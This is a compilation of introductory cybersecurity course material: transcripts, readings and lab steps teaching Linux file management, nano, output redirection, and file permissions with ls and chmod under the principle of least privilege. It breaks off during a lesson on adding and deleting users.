Now that we know why we need directories, let's take a look at some essential Linux commands for managing directories and files. First, let's take note of commands for creating and removing directories. The mkdir command creates a new directory. In contrast, rmdir removes or deletes a directory. A helpful feature of this command is its built-in warning that lets you know a directory is not empty. This saves you from accidentally deleting files. Next, you'll use other commands for creating and removing files. The touch command creates a new file, and the rm command removes or deletes a file. And last, we have our commands for copying and moving files or directories. The mv command moves a file or directory to a new location, and cp copies a file or directory into a new location.
Now, we're ready to try out these commands. First, let's use the pwd command, and then let's display the names of the files and directories in the analyst directory with the ls command. Imagine that we no longer need the old reports directory that appears among the file contents. Let's take a look at how to remove it. We input the rmdir command and follow it with the name of the directory we want to remove: oldreports. We can use the ls command to confirm that oldreports has been deleted and no longer appears among the contents. Now, let's make another change. We want a new directory for drafts of reports. We need to use the command mkdir and specify a name for this directory: drafts. If we input ls again, we'll notice the new directory drafts included among the contents of the analyst directory. Let's change into this new directory by entering cd drafts. If we run ls, it doesn't return any output, indicating that this directory is currently empty. But next, we'll add some files to it.
Let's say we want to draft new reports on recently installed email and OS patches. To create these files, we input touch email_patches.txt and then touch OS_patches.txt. Running ls indicates that these files are now in the drafts directory. What if we realize that we only need a new report on OS patches and we want to delete the email patches report? To do this, we input the rm command and specify the file to delete: email_patches.txt. Running ls confirms that it's been deleted.
Now, let's focus on our commands for moving and copying. We realize that we have a file called email_policy.txt in the reports folder that is currently in draft format. We want to move it into the newly created drafts folder. To do this, we need to change into the directory that currently has that file. Running ls in that directory indicates that it contains several files, including email_policy.txt. Then to move that file, we'll enter the mv command followed by two arguments. The first argument after mv identifies the file to be moved. The second argument indicates where to move it. If we change directories into drafts and then display its contents, we'll notice that the email policy file has been moved to this directory. We'll change back into reports. Displaying the file contents confirms that email_policy.txt is no longer there.
Okay, one more thing. vulnerabilities.txt is a file that we want to keep in the reports directory. But since it affects an upcoming project, we also want to copy it into the projects directory. Since we're already in the directory that has this file, we'll use the cp command to copy it into the projects directory. Notice that the first argument indicates which file to copy, and the second argument provides the path to the directory that it will be copied into. When we press enter, this copies the vulnerabilities file into the projects directory while also leaving the original within reports.
Isn't it cool what we can do with these commands? Now, let's focus on one more concept related to modifying files. In addition to using commands, you can also use applications to help you edit files. As a security analyst, file editors are often necessary for your daily tasks, like writing or editing reports. A popular file editor is nano. It's good for beginners. You can access this tool through the nano command. Let's get familiar with nano together. We'll add a title to our new draft report, OS_patches.txt. First, we change into the directory containing that file, then we input nano followed by the name of the file we want to edit: OS_patches.txt. This brings up the nano file editor with that file open. For now, we'll just enter the title OS Patches by typing this into the editor. We need to save this before returning to the command line, and to do so, we press Ctrl+O and then Enter to save it with the current file name. Then to exit, we press Ctrl+X.
Manage directories and files
Previously, you explored how to manage the file system using Linux commands. The following
commands were introduced: mkdir, rmdir, touch, rm, mv, and cp. In this reading, you’ll review these
commands and the nano text editor, and learn another way to write to files.
Creating and modifying directories
mkdir
The mkdir command creates a new directory. Like all the commands presented in this reading, you can
either provide the new directory as the absolute file path, which starts from the root, or as a relative file
path, which starts from your current directory.
For example, if you want to create a new directory called network in your /home/analyst/logs directory,
you can enter mkdir /home/analyst/logs/network to create this new directory. If you’re already in the
/home/analyst/logs directory, you can also create this new directory by entering mkdir network.
Pro Tip: You can use the ls command to confirm the new directory was added.
rmdir
The rmdir command removes, or deletes, a directory. For example, entering rmdir
/home/analyst/logs/network would remove this empty directory from the file system.
Note: The rmdir command cannot delete directories with files or subdirectories inside. For example,
entering rmdir /home/analyst returns an error message.
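The mkdir and rmdir behavior described above can be sketched in a few commands. This runs in a throwaway temp directory, with the reading's /home/analyst paths simulated as relative paths, so nothing on a real system is touched:

```shell
# Sandboxed sketch of mkdir and rmdir (the /home/analyst tree is simulated).
cd "$(mktemp -d)"
mkdir -p home/analyst/logs          # build the example tree
mkdir home/analyst/logs/network     # relative path from the current directory
ls home/analyst/logs                # confirm the new directory: network
rmdir home/analyst/logs/network    # deletes the now-empty directory
rmdir home/analyst 2>/dev/null || echo "rmdir failed: directory not empty"
```

The last line demonstrates the note above: rmdir refuses to delete a directory that still has contents.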
Creating and modifying files
touch and rm
The touch command creates a new file. This file won’t have any content inside. If your current directory
is /home/analyst/reports, entering touch permissions.txt creates a new file in the reports subdirectory
called permissions.txt.
The rm command removes, or deletes, a file. This command should be used carefully because it’s not
easy to recover files deleted with rm. To remove the permissions file you just created, enter rm
permissions.txt.
Pro Tip: You can verify that permissions.txt was successfully created or removed by entering ls.
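A quick sketch of touch and rm, again inside a disposable temp directory standing in for /home/analyst/reports:

```shell
# touch creates an empty file; rm deletes it (with no easy undo).
cd "$(mktemp -d)"
touch permissions.txt    # creates an empty file named permissions.txt
ls                       # confirms permissions.txt exists
rm permissions.txt       # deletes it; use rm carefully
ls                       # confirms the directory is empty again
```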
mv and cp
You can also use mv and cp when working with files. The mv command moves a file or directory to a new
location, and the cp command copies a file or directory into a new location. The first argument after mv
or cp is the file or directory you want to move or copy, and the second argument is the location you want
to move or copy it to.
To move permissions.txt into the logs subdirectory, enter mv permissions.txt /home/analyst/logs. Moving a
file removes the file from its original location. However, copying a file doesn’t remove it from its original
location. To copy permissions.txt into the logs subdirectory while also keeping it in its original location,
enter cp permissions.txt /home/analyst/logs.
Note: The mv command can also be used to rename files. To rename a file, pass the new name in as the
second argument instead of the new location. For example, entering mv permissions.txt perm.txt renames
the permissions.txt file to perm.txt.
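The three uses of mv and cp described above (copy, rename, move) can be seen side by side in a sandbox directory:

```shell
# cp copies, mv renames or moves depending on the second argument.
cd "$(mktemp -d)"
mkdir logs
touch permissions.txt
cp permissions.txt logs/      # copy: the original stays where it is
mv permissions.txt perm.txt   # rename: second argument is a new file name
mv perm.txt logs/             # move: second argument is a directory
ls logs                       # perm.txt  permissions.txt
```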
nano text editor
nano is a command-line file editor that is available by default in many Linux distributions. Many
beginners find it easy to use, and it’s widely used in the security profession. You can perform multiple
basic tasks in nano, such as creating new files and modifying file contents.
To open an existing file in nano from the directory that contains it, enter nano followed by the file name.
For example, entering nano permissions.txt from the /home/analyst/reports directory opens a new nano
editing window with the permissions.txt file open for editing. You can also provide the absolute file path
to the file if you’re not in the directory that contains it.
You can also create a new file in nano by entering nano followed by a new file name. For example,
entering nano authorized_users.txt from the /home/analyst/reports directory creates the
authorized_users.txt file within that directory and opens it in a new nano editing window.
Since there isn't an auto-saving feature in nano, it’s important to save your work before exiting. To save
a file in nano, use the keyboard shortcut Ctrl + O. You’ll be prompted to confirm the file name before
saving. To exit out of nano, use the keyboard shortcut Ctrl + X.
Note: Vim and Emacs are also popular command-line text editors.
Standard output redirection
There’s an additional way you can write to files. Previously, you learned about standard input and
standard output. Standard input is information received by the OS via the command line, and standard
output is information returned by the OS through the shell.
You’ve also learned about piping. Piping sends the standard output of one command as standard input to
another command for further processing. It uses the pipe character (|).
In addition to the pipe (|), you can also use the right angle bracket (>) and double right angle bracket
(>>) operators to redirect standard output.
When used with echo, the > and >> operators can be used to send the output of echo to a specified file
rather than the screen. The difference between the two is that > overwrites your existing file, and >>
adds your content to the end of the existing file instead of overwriting it. The > operator should be used
carefully, because it’s not easy to recover overwritten files.
When you’re inside the directory containing the permissions.txt file, entering echo "last updated date" >>
permissions.txt adds the string “last updated date” to the file contents. Entering echo "time" >
permissions.txt after this command overwrites the entire file contents of permissions.txt with the string
“time”.
Note: Both the > and >> operators will create a new file if one doesn’t already exist with your specified
name.
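The difference between >> and > is easy to see in a sandbox. This sketch mirrors the example above: two appends, then an overwrite:

```shell
# >> appends to a file; > replaces its contents. Both create the file
# if it doesn't exist yet.
cd "$(mktemp -d)"
echo "last updated date" >> permissions.txt    # creates the file, adds a line
echo "reviewed by analyst" >> permissions.txt  # appends a second line
cat permissions.txt                            # shows both lines
echo "time" > permissions.txt                  # replaces the entire contents
cat permissions.txt                            # shows only: time
```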
Knowing how to manage the file system in Linux is an important skill for security analysts. Useful
commands for this include: mkdir, rmdir, touch, rm, mv, and cp. When security analysts need to write to
files, they can use the nano text editor, or the > and >> operators.
Activity overview – Manage Files with Linux Commands
In this lab activity, you’ll use Linux commands to modify a directory structure and the files
it contains.
You’ll also use the nano text editor to add text to a file.
You previously learned that directories help you organize subdirectories and files in Linux.
As a security analyst, creating, removing, and editing directories and files are core tasks
you’ll need to perform to help you to manage data.
When data is well organized, you can more easily detect issues and keep data safe.
With that in mind, you’re now ready to practice what you've learned.
Scenario
In this scenario, you need to ensure that the /home/analyst directory is properly organized.
You have to make a few changes to the /home/analyst directory and the files it contains.
You also have to edit a file to record the changes or updates you make to the directory.
Note: The lab starts with your user account, called analyst, already logged in to a Bash shell.
This means you can start with the tasks as soon as you click the Start Lab button.
When you start, the /home/analyst directory contains the following subdirectories and
files:
home
└── analyst
├── notes
│ ├── Q3patches.txt
│ └── tempnotes.txt
├── reports
│ ├── Q1patches.txt
│ └── Q2patches.txt
└── temp
You need to modify the /home/analyst directory to the following directory and file
structure:
home
└── analyst
├── logs
├── notes
│ └── tasks.txt
└── reports
├── Q1patches.txt
└── Q2patches.txt
└── Q3patches.txt
Here’s how you’ll do this: First, you’ll create a new subdirectory called logs in
the /home/analyst directory. Next, you’ll remove the temp subdirectory. Then, you’ll move
the Q3patches.txt file to the reports subdirectory and delete the tempnotes.txt file. Finally,
you’ll create a new .txt file called tasks in the notes subdirectory and add a note to the file
describing the tasks you've performed.
You’ll need to use the commands learned in the video lesson to complete these steps.
This might sound like quite a few tasks to perform, but you’ll be guided on how to do this.
Task 1. Create a new directory
First, you must create a dedicated subdirectory called logs, which will be used to store all
future log files.
1. Create a new subdirectory called logs in the /home/analyst directory.
2. List the contents of the /home/analyst directory to confirm that you’ve successfully
created the new logs subdirectory.
The output should list the original three directories and the new logs subdirectory:
logs notes reports temp
Task 2. Remove a directory
Next, you must remove the temp directory, as you’ll no longer be placing items in it.
1. Remove the /home/analyst/temp directory.
2. List the contents of the /home/analyst directory to confirm that you have removed
the temp subdirectory.
The temp directory should no longer be listed:
logs notes reports
Task 3. Move a file
The Q3patches.txt file contains notes taken on third-quarter patches and is now in the
correct reporting format.
You must move the Q3patches.txt file from the notes directory to the reports directory.
1. Navigate to the /home/analyst/notes directory.
2. Move the Q3patches.txt file from the /home/analyst/notes directory to
the /home/analyst/reports directory.
3. List the contents of the /home/analyst/reports directory to confirm that you have
moved the file successfully.
When you list the contents of the reports directory, it should show that three quarterly
report files are now in the reports directory:
Q1patches.txt Q2patches.txt Q3patches.txt
Task 4. Remove a file
Next, you must delete an unused file called tempnotes.txt from
the /home/analyst/notes directory.
1. Remove the tempnotes.txt file from the /home/analyst/notes directory.
2. List the contents of the /home/analyst/notes directory to confirm that you’ve
removed the file successfully.
No files should be listed in the notes directory.
Task 5. Create a new file
Now, you must create a file named tasks.txt in the /home/analyst/notes directory that you’ll
use to document completed tasks.
1. Use the touch command to create an empty file called tasks.txt in
the /home/analyst/notes directory.
2. List the contents of the /home/analyst/notes directory to confirm that you have
created a new file.
A file called tasks.txt should now exist in the notes directory:
tasks.txt
Task 6. Edit a file
Finally, you must use the nano text editor to edit the tasks.txt file and add a note describing
the tasks you’ve completed.
1. Using the nano text editor, open the tasks.txt file that is located in
the /home/analyst/notes directory.
Note: This action changes the shell from the normal Bash interface to the nano text editor
interface.
2. Copy and paste the following text into the text input area of the nano editor:
Completed tasks
1. Managed file structure in /home/analyst
3. Press CTRL+X to exit the nano text editor.
This triggers a prompt asking Save modified buffer?
4. Press Y to confirm that you want to save the new data to your file. (Answering "no"
will discard changes.)
5. Press ENTER to confirm that File Name to Write is tasks.txt.
Note: The recommended sequence of commands for saving a file with the nano text
editor is to use CTRL+O to tell nano to save the file and then use CTRL+X to exit
immediately.
In this web-based lab environment, the CTRL+O command is intercepted by your
web browser and is interpreted as a request to save the web page. The sequence
used here is a commonly used alternative that achieves the same end result.
6. Use the clear command to clear the Bash shell window and remove any traces of the
nano text input area.
Note: Most Bash shells typically handle the screen cleanup after you exit nano. In this lab
environment, nano sometimes leaves some text clutter around the edges of the screen that
the clear command cleans up for you.
7. Display the contents of the tasks.txt file to confirm that it contains the updated task
details.
This file should now contain the contents of the tasks.txt file that you added and saved in
previous steps:
Completed tasks
1. Managed file structure in /home/analyst
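The lab's five file-management tasks can be sketched as one non-interactive sequence. The starting tree is rebuilt inside a temp directory, and echo stands in for nano (which is interactive), so this is an illustration of the steps rather than the lab environment itself:

```shell
# Recreate the lab's starting tree, then apply Tasks 1-5.
cd "$(mktemp -d)"
mkdir -p analyst/notes analyst/reports analyst/temp
touch analyst/notes/Q3patches.txt analyst/notes/tempnotes.txt
touch analyst/reports/Q1patches.txt analyst/reports/Q2patches.txt
cd analyst
mkdir logs                          # Task 1: new logs subdirectory
rmdir temp                          # Task 2: remove the empty temp directory
mv notes/Q3patches.txt reports/     # Task 3: move the Q3 report
rm notes/tempnotes.txt              # Task 4: delete the unused file
touch notes/tasks.txt               # Task 5: create the task log
echo "Completed tasks" >> notes/tasks.txt   # stand-in for the nano edit
ls reports                          # Q1patches.txt  Q2patches.txt  Q3patches.txt
```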
Authenticate and Authorize Users
Hi there. It's great
to have you back! Let's continue to learn
more about how to work in Linux as a
security analyst. In this video, we'll explore file and directory
permissions. We'll learn how Linux
represents permissions and how you can check
for the permissions associated with files
and directories. Permissions are the type of access granted for a
file or directory. Permissions are related
to authorization. Authorization is the concept of granting access to specific
resources in a system. Authorization allows you to limit access to specified
files or directories. A good rule to follow is that data access is on a
need-to-know basis. You can imagine the security risk it would impose if anyone could access or
modify anything they wanted to on a system. There are three types
of permissions in Linux that an authorized user can have. The first type of
permission is read. On a file, read permission means the contents of the
file can be read. On a directory, this permission means you can read all files in that directory. Next
are write permissions. Write permissions on a file allow modifications of
contents of the file. On a directory, write permissions indicate that new files can be created
in that directory. Finally, there are also execute permissions. Execute permissions on files mean that
the file can be executed if it's an executable file. Execute permissions on directories allow users to
enter into a directory and access its files. Permissions are granted for three different types of
owners. The first type is the user. The user is the owner of the file. When you create a file, you
become the
owner of the file, but the ownership can be changed. Group is the next type. Every user is a part
of a certain group. A group consists of several users, and this is one way to manage a multi-user
environment. Finally, there is other. Other can be considered all other users on the system.
Basically, anyone else with access to the system belongs to this group. In Linux, file permissions are
represented with a 10-character string. For a directory with full permissions for user, group, and other, this
string would be: drwxrwxrwx. Let's examine what this means more closely. The first character
indicates the file type. As shown in this example, d is used to indicate it is a directory. If this
character contains a hyphen instead, it would be a regular file. The second, third, and fourth
characters indicate the permissions for the user. In this example, r indicates the user has read
permissions, w indicates the user has write permissions, and x indicates the user has execute
permissions. If one of these permissions was missing, there would be a hyphen instead of the letter.
In the same way, the fifth, sixth, and seventh characters indicate permissions for the next owner
type: group. As shown here, the group also has read, write, and execute permissions. There
are no hyphens to indicate that any of these permissions haven't been granted. Finally, the eighth
through tenth characters indicate permissions for the last owner type: other. They also have read,
write, and execute permissions in this example. Ensuring files and directories are set with their
appropriate access permissions is critical to protecting sensitive files and maintaining the overall
security of a system. For example, payroll departments handle sensitive information. If someone
outside of the payroll group could read this file, this would be a privacy concern. Another example
is when the user, the group, and other can all write to a file. This type of file is considered
a world-writable file. World-writable files can pose significant security risks. So how do we check
permissions?
First, we need to understand what options are. Options modify the behavior of the command. The
options for a command can be a single letter or a full word. Checking permissions involves adding
options to the ls command. First, ls -l displays permissions to files and directories. You might also
want to display hidden files and identify their permissions. Hidden files, which begin with a period
before their name, don't normally appear when you use ls to display file contents. Entering ls -a
displays hidden files. Then you can combine these two options to do both. Entering ls -la displays
permissions to files and directories, including hidden files. Let's get into Bash and try out these
options. Right now, we're in the project subdirectory. First, let's use the ls command to display its
contents. The output displays the files in this directory, but we don't know anything
about their permissions. By using ls -l instead, we get expanded information on these files. Let's do
this. The file names are now on the right side of each row. The first piece of
information in each row shows the permissions in the format that we
discussed earlier. Since these are all files and not directories, notice how the first
character is a hyphen. Let's focus on one specific
file: project1.txt. The second through fourth
characters of its permissions show us the user has both read and
write permissions but lacks execute permissions. In both the fifth through seventh characters and
eighth
through tenth characters, the sequence is r--. This means group and other
have only read privileges. After the permissions, ls -l
first displays the username. Here, that's us, analyst. Next comes the group name; in our case, the
security group. Now let's use ls -a. The output includes
two more files: hidden files named .hidden1.txt and .hidden2.txt. Finally, we can also use
ls -la to show the
permissions for all files, including these hidden files. I thought that was pretty
interesting. Did you? You now know a little more about file permissions and ownership. This will be
helpful when working in security because monitoring and setting correct permissions is essential
for
protecting information.
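The demo above can be reproduced on any Linux system. The sketch below builds a file whose permission string matches the example (-rw-r--r--) plus a hidden file, then runs the three ls variants. chmod 644 is used here as a setup shortcut; it is the numeric spelling of user read/write, group read, other read:

```shell
# A file with -rw-r--r-- permissions and a hidden file, inspected with ls.
cd "$(mktemp -d)"
touch project1.txt .hidden1.txt
chmod 644 project1.txt
ls -l project1.txt    # permission string: -rw-r--r--
ls -a                 # hidden files (leading .) now appear
ls -la                # long listing that includes hidden files
```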
Change Permissions
Hi there! In the previous video, you learned how to check permissions for a user. In this video,
we're going to learn about changing permissions. When working as a security analyst, there may be
many reasons to change permissions for a user. A user may have changed departments or been
assigned to a
different work group. A user might simply no longer be working on a project that requires certain
permissions. These changes are necessary in order to protect system files from being accidentally
or deliberately altered or deleted. Let's explore a related command that helps control this access. In
this video, we'll learn about chmod. chmod changes permissions on files and directories. The
command chmod stands for change mode. There are two modes for changing permissions, but we'll
focus on symbolic. The best way to learn about how chmod works is through an example. I know
this has a lot of details, but we'll break this down. Also, please keep in mind that, like many Linux
commands, you don't have to memorize the information and can always find a reference. With
chmod, you need to identify which file or directory you want to adjust permissions for. This is the
final argument, in this case, a file named: access.txt. The first argument, added directly after the
chmod command, indicates how to change permissions. Right now, this might seem hard to
interpret, but soon we'll understand why this is called symbolic mode. Previously, we learned about
the three types of owners: user, group, and other. To identify these with chmod, we use u to
represent the user, g to represent the group, and o to represent other. In this example, g indicates
we will make some changes to group permissions, and o to permissions for other. These owner
types are separated by a comma in this argument. But do we want to add or take away permissions?
Well, for this, we use mathematical operators. So, the plus sign after g means we want to add
permissions for group. The minus sign after o means we want to take them away from other. And
the last question is: what kind of changes? We've already learned that r represents read
permissions, w represents write permissions, and x represents execute permissions. So in this case,
the w indicates that we're adding write permissions to the group, and r indicates that we are taking
away read permissions from other. This is still very complex. But now that we've broken it down,
perhaps it doesn't seem quite so much like a foreign language. And remember, you don't have to
memorize this all. Let's give this new command a try. We'll start out in the logs sub-directory. If we
use the ls -l command, it will output the permissions for the file. It shows the permissions for the
only file in this directory: access.txt. Previously, we learned how to read these permissions. The
second through fourth characters indicate that the user has read and write permissions. The fifth
through seventh characters show the group only has read permissions. And the eighth to tenth
characters show that other only has read permissions. We need to adjust these permissions. We
want to ensure analysts in the security group
have write permissions, but take away read permissions from the owner type other, so we add write
permissions for group and remove read permissions for other. Let's run ls -l again. This shows a
change in the permissions for access.txt. Notice how in the middle segment of permissions for the
group, w has been added to give write permissions. And another change is that the r has been
removed
in the last segment, indicating that read permissions for other have been removed. As mentioned
earlier, these hyphens indicate a lack of permissions. Now, other is lacking
all permissions. Though it requires practice, working in Linux becomes
more natural with time.
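The video's example can be replayed in a sandbox. The file is set up as -rw-r--r-- (chmod 644 is the numeric shortcut for that starting state), and then the symbolic change from the video is applied:

```shell
# The video's chmod example: g+w adds group write, o-r removes other's read.
cd "$(mktemp -d)"
touch access.txt
chmod 644 access.txt          # starting point: -rw-r--r--
chmod g+w,o-r access.txt      # one argument, owner types separated by a comma
ls -l access.txt              # permission string is now: -rw-rw----
```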
Permission commands
Previously, you explored file permissions and the commands that you can use to display and change
them. In this reading, you’ll review these concepts and also focus on an example of how these
commands work together when putting the principle of least privilege into practice.
Reading permissions
In Linux, permissions are represented with a 10-character string. Permissions include:
● read: for files, this is the ability to read the file contents; for directories, this is the ability to read all contents in the directory, including both files and subdirectories
● write: for files, this is the ability to make modifications on the file contents; for directories, this is the ability to create new files in the directory
● execute: for files, this is the ability to execute the file if it’s a program; for directories, this is the ability to enter the directory and access its files
These permissions are given to these types of owners:
● user: the owner of the file
● group: a larger group that the owner is a part of
● other: all other users on the system
Each character in the 10-character string conveys different information about these permissions. The
following table describes the purpose of each character:
Character  Example      Meaning
1st        drwxrwxrwx   file type: d for a directory, - for a regular file
2nd        drwxrwxrwx   read permissions for the user: r if the user has read permissions, - if not
3rd        drwxrwxrwx   write permissions for the user: w if the user has write permissions, - if not
4th        drwxrwxrwx   execute permissions for the user: x if the user has execute permissions, - if not
5th        drwxrwxrwx   read permissions for the group: r if the group has read permissions, - if not
6th        drwxrwxrwx   write permissions for the group: w if the group has write permissions, - if not
7th        drwxrwxrwx   execute permissions for the group: x if the group has execute permissions, - if not
8th        drwxrwxrwx   read permissions for other: r if the other owner type has read permissions, - if not
9th        drwxrwxrwx   write permissions for other: w if the other owner type has write permissions, - if not
10th       drwxrwxrwx   execute permissions for other: x if the other owner type has execute permissions, - if not
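One way to see this string on its own is the stat command. The -c '%A' option shown below is the GNU coreutils spelling (BSD/macOS stat uses a different syntax), so this is a sketch for a typical Linux system rather than a universal recipe:

```shell
# Printing just the 10-character permission string with GNU stat.
cd "$(mktemp -d)"
mkdir reports && chmod 755 reports
stat -c '%A' reports          # drwxr-xr-x : directory; user rwx, group/other r-x
touch notes.txt && chmod 640 notes.txt
stat -c '%A' notes.txt        # -rw-r----- : user rw, group r, other nothing
```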
Exploring existing permissions
You can use the ls command to investigate who has permissions on files and directories. Previously, you
learned that ls displays the names of files in directories in the current working directory.
There are additional options you can add to the ls command to make your command more specific. Some
of these options provide details about permissions. Here are a few important ls options for security
analysts:
● ls -a: Displays hidden files. Hidden files start with a period (.) at the beginning.
● ls -l: Displays permissions to files and directories. Also displays other additional information, including owner name, group, file size, and the time of last modification.
● ls -la: Displays permissions to files and directories, including hidden files. This is a combination of the other two options.
Changing permissions
The principle of least privilege is the concept of granting only the minimal access and authorization
required to complete a task or function. In other words, users should not have privileges that are beyond
what is necessary. Not following the principle of least privilege can create security risks.
The chmod command can help you manage this authorization. The chmod command changes
permissions on files and directories.
Using chmod
The chmod command requires two arguments. The first argument indicates how to change permissions,
and the second argument indicates the file or directory that you want to change permissions for. For
example, the following command would add all permissions to login_sessions.txt:
chmod u+rwx,g+rwx,o+rwx login_sessions.txt
If you wanted to take all the permissions away, you could use
chmod u-rwx,g-rwx,o-rwx login_sessions.txt
Another way to assign these permissions is to use the equals sign (=) in this first argument. Using =
with chmod sets, or assigns, the permissions exactly as specified. For example, the following command
would set read permissions for login_sessions.txt for user, group, and other:
chmod u=r,g=r,o=r login_sessions.txt
This command overwrites existing permissions. For instance, if the user previously had write
permissions, these write permissions are removed after you specify only read permissions with =.
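The three operators can be applied in sequence to the same file to see how they differ. This sketch uses the login_sessions.txt example from the reading:

```shell
# + adds, - removes, and = assigns exactly (discarding prior permissions).
cd "$(mktemp -d)"
touch login_sessions.txt
chmod u+rwx,g+rwx,o+rwx login_sessions.txt   # add: everyone gets everything
chmod u-rwx,g-rwx,o-rwx login_sessions.txt   # remove: all permissions gone
chmod u=r,g=r,o=r login_sessions.txt         # assign: exactly read-only for all
ls -l login_sessions.txt                     # permission string: -r--r--r--
```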
The following table reviews how each character is used within the first argument of chmod:
Character  Description
u          indicates changes will be made to user permissions
g          indicates changes will be made to group permissions
o          indicates changes will be made to other permissions
+          adds permissions for the user, group, or other
-          removes permissions from the user, group, or other
=          assigns permissions for the user, group, or other
Note: When there are permission changes to more than one owner type, commas are needed to separate
changes for each owner type. You should not add spaces after those commas.
The principle of least privilege in action
As a security analyst, you may encounter a situation like this one: There’s a file called bonuses.txt within
a compensation directory. The owner of this file is a member of the Human Resources department with
a username of hrrep1. It has been decided that hrrep1 needs access to this file. But, since this file contains
confidential information, no one else in the hr group needs access.
You run ls -l to check the permissions of files in the compensation directory and discover that the
permissions for bonuses.txt are -rw-rw----. The group owner type has read and write permissions that do
not align with the principle of least privilege.
To remedy the situation, you input chmod g-rw bonuses.txt. Now, only the user who needs to access this
file to carry out their job responsibilities can access this file.
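The bonuses.txt walkthrough can be replayed in a sandbox. chmod 660 is used below only to set up the starting state the scenario describes (-rw-rw----); the fix itself is the single symbolic command from the text:

```shell
# Least privilege in action: strip group read/write from bonuses.txt.
cd "$(mktemp -d)"
touch bonuses.txt
chmod 660 bonuses.txt     # starting state found with ls -l: -rw-rw----
chmod g-rw bonuses.txt    # remove group read and write permissions
ls -l bonuses.txt         # permission string is now: -rw-------
```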
Key takeaways
Managing directory and file permissions may be a part of your work as a security analyst. Using ls with
the -l and -la options allows you to investigate directory and file permissions. Using chmod allows you to
change user permissions and ensure they are aligned with the principle of least privilege.
Activity: Manage Authorization
Activity overview
In this lab activity, you’ll use Linux commands to configure authorization.
Authorization is the concept of granting access to specific resources in a system. It's
important because, without authorization, any user could access and modify all files
belonging to other users or system files. This would certainly be a security risk.
In Linux, file and directory permissions are used to specify who has access to specific files
and directories. You’ll explore file and directory permissions and change the ownership of a
file and a directory to limit who can access them.
As a security analyst, setting appropriate access permissions is critical to protecting
sensitive information and maintaining the overall security of a system.
Scenario
In this scenario, you must examine and manage the permissions on the files in
the /home/researcher2/projects directory for the researcher2 user.
The researcher2 user is part of the research_team group.
You must check the permissions for all files in the directory, including any hidden files, to
make sure that permissions align with the authorization that should be given. When it
doesn't, you must change the permissions.
Here’s how you’ll do this task: First, you’ll check the user and group permissions for all files
in the projects directory. Next, you’ll check whether any files have incorrect permissions
and change the permissions as needed. Finally, you’ll check the permissions of
the /home/researcher2/projects/drafts directory and modify these permissions to remove
any unauthorized access.
Note: The lab starts with your user account, called researcher2, already logged in to the Bash shell.
This means you can start with the tasks as soon as you click the Start Lab button.
Task 1. Check file and directory details
In this task, you must explore the permissions of the projects directory and the files it
contains. The lab starts with /home/researcher2 as the current working directory. This is
because you're changing permissions for files and directories belonging to
the researcher2 user.
1. Navigate to the projects directory.
2. List the contents and permissions of the projects directory.
The permissions of the files in the projects directory are as follows:
total 20
drwx--x--- 2 researcher2 research_team 4096 Oct 14 18:40 drafts
-rw-rw-rw- 1 researcher2 research_team 46 Oct 14 18:40 project_k.txt
-rw-r----- 1 researcher2 research_team 46 Oct 14 18:40 project_m.txt
-rw-rw-r-- 1 researcher2 research_team 46 Oct 14 18:40 project_r.txt
-rw-rw-r-- 1 researcher2 research_team 46 Oct 14 18:40 project_t.txt
Note: The date and time information returned is the same as the date and time when you ran the
command. Therefore, it is different from the date and time in the example.
As you may recall from the video lesson, a 10-character string begins each entry and
indicates how the permissions on the file are set. For instance, a directory with full
permissions for all owner types would be drwxrwxrwx:
● The 1st character indicates the file type. The d indicates it’s a directory. When this character is a hyphen (-), it's a regular file.
● The 2nd-4th characters indicate the read (r), write (w), and execute (x) permissions for the user. When one of these characters is a hyphen (-) instead, it indicates that this permission is not granted to the user.
● The 5th-7th characters indicate the read (r), write (w), and execute (x) permissions for the group. When one of these characters is a hyphen (-) instead, it indicates that this permission is not granted for the group.
● The 8th-10th characters indicate the read (r), write (w), and execute (x) permissions for the owner type of other. This owner type consists of all other users on the system apart from the user and the group. When one of these characters is a hyphen (-) instead, it indicates that this permission is not granted for other.
The second block of text in the expanded directory listing is the user who owns the file. The
third block of text is the group owner of the file.
Task 2. Change file permissions
In this task, you must determine whether any files have incorrect permissions and then
change the permissions as needed. This action will remove unauthorized access and
strengthen security on the system.
None of the files should allow the other users to write to files.
1. Check whether any files in the projects directory have write permissions for the owner type
of other.
2. Change the permissions of the file identified in the previous step so that the owner
type of other doesn’t have write permissions.
chmod o-w project_k.txt
Note: Permissions are granted for three different types of owners, namely user, group, and
other.
In the chmod command, u sets the permissions for the user who owns the file, g sets the permissions for the group that owns the file, and o sets the permissions for others.
3. The file project_m.txt is a restricted file and should not be readable or writable by
the group or other; only the user should have these permissions on this file. List the
contents and permissions of the current directory and check if the group has read or
write permissions.
4. Use the chmod command to change permissions of the project_m.txt file so that the
group doesn’t have read or write permissions.
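The two fixes in this task can be sketched end to end on scratch copies of the files. In the lab the files already exist; here they are created first so the chmod commands can be verified. The starting mode for project_k.txt is assumed for illustration, while project_m.txt starts from the -rw-r----- mode shown in the directory listing.

```shell
# Sketch of the task's two fixes on scratch copies of the lab files.
cd "$(mktemp -d)"
touch project_k.txt project_m.txt
chmod 666 project_k.txt   # assumed starting state: other has write access
chmod 640 project_m.txt   # starting state from the listing: -rw-r-----

chmod o-w project_k.txt   # step 2: remove write for the owner type of other
chmod g-rw project_m.txt  # step 4: remove read and write for the group

stat -c '%A %n' project_k.txt project_m.txt
```

After the fixes, project_k.txt is -rw-rw-r-- and project_m.txt is -rw-------, so only the user can read or write the restricted file.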
Linux Portfolio Activity
In this activity, you will create a new portfolio document to demonstrate your experience
using Linux commands to manage file permissions. You can add this document to your
cybersecurity portfolio, which you can share with prospective employers or recruiters. To
review the importance of building a professional portfolio and options for creating your
portfolio, read Create a cybersecurity portfolio.
To create your portfolio document, you will review a scenario and follow a series of steps.
This scenario is connected to the lab you have just completed about how to examine and
manage file permissions. You will explain the commands you used in that lab, and this will
help you prepare for future job interviews and other steps in the hiring process.
Be sure to complete this activity and answer the questions that follow before moving on.
The next course item will provide you with a completed exemplar to compare to your own
work.
Scenario
You are a security professional at a large organization. You mainly work with their research
team. Part of your job is to ensure users on this team are authorized with the appropriate
permissions. This helps keep the system secure.
Your task is to examine existing permissions on the file system. You’ll need to determine if
the permissions match the authorization that should be given. If they do not match, you’ll
need to modify the permissions to authorize the appropriate users and remove any
unauthorized access.
Add and Delete Users
In this video, we are going to discuss adding and deleting users. This is related to the concept of
authentication. Authentication is the process of a user proving that they are who they say they are in
the system. Just like in a physical building, not all users should be allowed in. Not all users should
get access to the system. But we also want to make sure everyone who should have access to the
system has it. That's why we need to add users. New users can be new to the organization or new to
a group. This could be related to a change in organizational structure or simply a directive from
management to move someone. When users leave the organization, they need to be deleted. They
